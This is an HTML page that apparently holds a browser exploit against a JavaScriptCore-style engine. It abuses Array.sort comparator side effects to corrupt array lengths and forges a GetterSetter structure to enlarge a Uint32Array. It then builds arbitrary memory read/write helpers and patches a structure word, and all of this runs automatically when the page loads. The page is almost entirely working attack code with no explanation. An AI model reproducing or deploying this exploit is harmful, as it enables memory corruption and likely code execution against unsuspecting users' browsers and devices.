<html>
<body>
<script src="inc/utils.js"></script>
<script type="text/javascript">

// global vars
var _gc, _cnt = 0;
var seq = -1;

function initMemoryHole()
{
	try {
		var u32 = new Uint32Array(8);
		var a1 = [0,1,2,3,u32];
		var a2 = [0,1,2,3,4]; // right after a1
		var a1len = a1.length;
		var a2len = a2.length;
		var u32len = u32.length;

		if (!_gc) _gc = new Array();
		_gc.push(u32,a1,a2);

		var myCompFunc = function(x,y)
		{
			if (y == 3 && x == u32) {
				a1.shift();
			}
			return 0;
		}

		a1.sort(myCompFunc);

		var u32addr = a2.length;
		if (u32addr == a2len) { logAdd("error: 1"); return 1; }

		myCompFunc = function(x,y)
		{
			if (y == 0 && x == 1) {
				a1.length = a1len;
				a1.shift();
				a2.length = u32addr + 0x28;
			}
			if (y == 3) {
				a1.unshift(0);
			}
			return 0;
		}

		a1.sort(myCompFunc);

		var c = a2.length;
		if (c != u32addr + 0x28) { logAdd("error: 2"); a1[3] = 0; return 2; }

		var mo = {};
		var pd = { get: function(){return 0;}, set: function(arg){return 0;}, enumerable:true, configurable:true }
		var a3 = [0,1,2,a1[3]];

		Object.defineProperty(mo, "prop0", pd);
		for(var i=1; i < 7; i++){
			mo["prop"+i] = i;
		}

		_gc.push(a3,mo,pd);

		myCompFunc = function(x,y)
		{
			if (y == 2) {
				a3.shift();
			}
			return 0;
		}

		a3.sort(myCompFunc);
		a1[3] = 0; a3[3] = 0;

		u32.prop1 = 8; 	// 8 = JSType.GetterSetterType
		u32.prop2 = 8;
		u32.prop3 = 8;
		u32.prop4 = u2d(u32addr, u32addr+0x10); // ((GetterSetter)mo.prop0).m_structure

		var f = new Function(" return 876543210 + " + (_cnt++) + ";");
		f.prop2 = u2d(0x40000000,0x40000000); // a new value for u32.length
		f();

		pd.get = f;
		Object.defineProperty(mo, "prop0", pd);

		delete mo.prop0;

		if (u32.length == u32len) { logAdd("error: 3"); return 3; }

		var u32base = u32[0x40000000-2];

		// declare aux functions
		getU32 = function(addr) {
			return u32[(addr - u32base) >>> 2];
		}
		setU32 = function(addr,val) {
			return u32[(addr - u32base) >>> 2] = val;
		}

		var base = getU32(u32addr);
		for (var i = 0; i < 24; ++i) {
			 setU32(u32base + 0x40 + (i << 2), getU32(base + (i << 2)));
		}
		setU32(u32addr, u32base + 0x40);
		logAdd(getU32(u32base + 0x40 + (18 << 2)).toString(16));
		setU32(u32base + 0x40 + (18 << 2), 0x81b00523);
		logAdd(u32.toString());
		return u32base;
	}
	catch(e) {
		logAdd("Error: " + e);
	}

	return 0;
}
window.onload = function() {
	u32addr = initMemoryHole();
}
</script>

<div id="log"></div>
</body>
</html>
